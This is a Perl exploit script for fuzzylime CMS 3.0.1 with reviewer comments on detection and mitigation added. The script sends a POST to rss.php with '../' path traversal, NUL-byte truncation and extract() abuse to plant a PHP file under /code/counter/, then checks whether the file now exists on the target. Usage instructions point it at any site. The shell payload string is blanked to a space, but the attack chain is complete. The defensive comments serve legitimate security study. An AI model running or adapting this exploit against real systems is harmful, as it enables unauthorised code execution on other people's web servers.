#!/usr/bin/perl
#
# fuzzylime 3.0.1 Perl exploit
#
# discovered & written by Ams
# ax330d@gmail.com
#
# DESCRIPTION:
# Files can be loaded through the script rss.php, and there is also
# unfiltered extract() usage.
# This exploit creates shell in /code/counter/middle_index_inc.php
#
# USAGE:
# Run exploit: perl expl.pl http://www.site.com
#
# NEEDED:
# magic_quotes_gpc=off
#
# NOTE(review): the path in DESCRIPTION says "middle_index_inc.php", but the
# code below sets $shell_name to 'middle_index.inc.php'. The code value is the
# one that appears in both requests.
#
# Reviewer summary (what the script sends):
#   1. One POST to <path>/rss.php whose form body carries p, s and curcount.
#      p is a "../" relative path ending in a URL-encoded NUL byte (%00);
#      s is the target file name, also ending in %00; curcount is $shell.
#   2. After one second, one body-less POST to <path>/code/counter/<name>,
#      reported as [OK] when the response contains "200 OK".
#
# Detection: both requests are plain HTTP on port 80 and are visible in web
# server or WAF logs: a POST to rss.php with "../" and "%00" in the form body,
# followed by a request for a .php file under /code/counter/.
#
# Mitigation: the header names the root causes, a request-controlled file load
# in rss.php and extract() on unfiltered input. Restricting the load target to
# a fixed allow-list and not calling extract() on request data removes both.
# PHP 5.3.4 and later reject NUL bytes in file paths, which blocks the %00
# truncation used here. magic_quotes_gpc (listed under NEEDED) is not a
# dependable control and was removed in PHP 5.4.

use strict;
use IO::Socket;

# Banner. The product name is misspelled in this runtime string; it is
# reproduced as-is.
print "\n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n\t\t fuzzlyime 3.0.1 exploit \n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n";

# Exactly one argument is required: the base URL of the installation.
if(@ARGV<1){
    die "\n\tUsage:\texpl.pl url\n\n \n\tExample:\texpl.pl http://localhost/path/\n\n";
}

my $expl_url=$ARGV[0];

# Value sent as the "curcount" form field. In this copy the string holds only
# a single space.
my $shell=q~ ~;

# File name sent in the "s" field and requested afterwards under
# /code/counter/.
my $shell_name='middle_index.inc.php';

print "\tStarting exploit...\n";

# Prepend the scheme when the argument does not contain "http://".
# NOTE(review): the match is unanchored, so "http://" anywhere in the argument
# counts.
if($expl_url=~m#http://#){
    exploit($expl_url);
} else {
    exploit('http://'.$expl_url);
}

# exploit($site)
#
# Sends the two requests described in the file header to the host taken from
# $site and prints "[OK]" or "[FAIL]" for that URL.
#
# Parameters: $site - URL of the form http://host/path (last element of @_).
# Returns:    nothing useful; dies if either TCP connection cannot be opened.
sub exploit {

    # Split the URL on "/". For "http://host/a/b" this yields "http:", "",
    # "host", then the path segments, so $c is the host and @d is the path.
    # NOTE(review): lexical $a and $b shadow the variables used by sort();
    # harmless here because this sub never sorts.
    my $site=pop @_;
    (my $a,my $b,my $c,my @d)=split /\//,$site;
    my $path=join('/',@d);
    my $host=$c;
    if($path) {$path='/'.$path;}

    # Form body for rss.php. "p" is a relative path with "../" and a trailing
    # %00; "s" and "curcount" carry the file name and $shell.
    # How rss.php and content.php consume these fields is not shown on this
    # page. Presumably extract() turns them into variables used by the counter
    # code; confirm against the fuzzylime 3.0.1 source.
    my $injection="p=../code/content.php%00&s=$shell_name%00&curcount=$shell";
    my $length=length($injection);

    # First request: the POST to rss.php. Port 80 is hard-coded and the
    # connection is plain TCP.
    my $socket=IO::Socket::INET->new(
        Proto=>"tcp",
        PeerAddr=>$host,
        PeerPort=>"80"
    );

    if( ! $socket){
        die("\n\tUnable to connect to http://$host\n\n");
    } else {
        my $packet = "POST $path/rss.php HTTP/1.1\r\n";
        $packet .= "Host: $host\r\n";
        $packet .= "Connection: Close\r\n";
        $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $packet .= "Content-Length: $length\r\n\r\n";
        $packet .= "$injection";
        # The socket is closed right after the write; the response to this
        # request is never read.
        print $socket $packet;
        close($socket);
    }

    # Pause before the follow-up request.
    sleep(1);

    # Second request: ask for the file under /code/counter/ and inspect the
    # reply.
    $socket=IO::Socket::INET->new(
        Proto=>"tcp",
        PeerAddr=>$host,
        PeerPort=>"80"
    );

    if( ! $socket){
        die("\n\tUnable to connect to http://$host (check shell yourself)\n\n");
    } else {
        # A POST with no body and no Content-Length header.
        my $packet = "POST $path/code/counter/$shell_name HTTP/1.1\r\n";
        $packet .= "Host: $host\r\n";
        $packet .= "Connection: Close\r\n\r\n";
        print $socket $packet;

        # Read the whole response until the server closes the connection.
        my $rcv;
        my $dat='';
        while($rcv=<$socket>){
            $dat.=$rcv;
        }

        # The result is decided by the substring "200 OK" anywhere in the
        # response, headers or body.
        if ($dat =~ /200 OK/){
            print "\n\t$site\t[OK]\n\n";
        } else {
            print "\n\t$site\t[FAIL]\n\n";
        }
        close($socket);
    }
}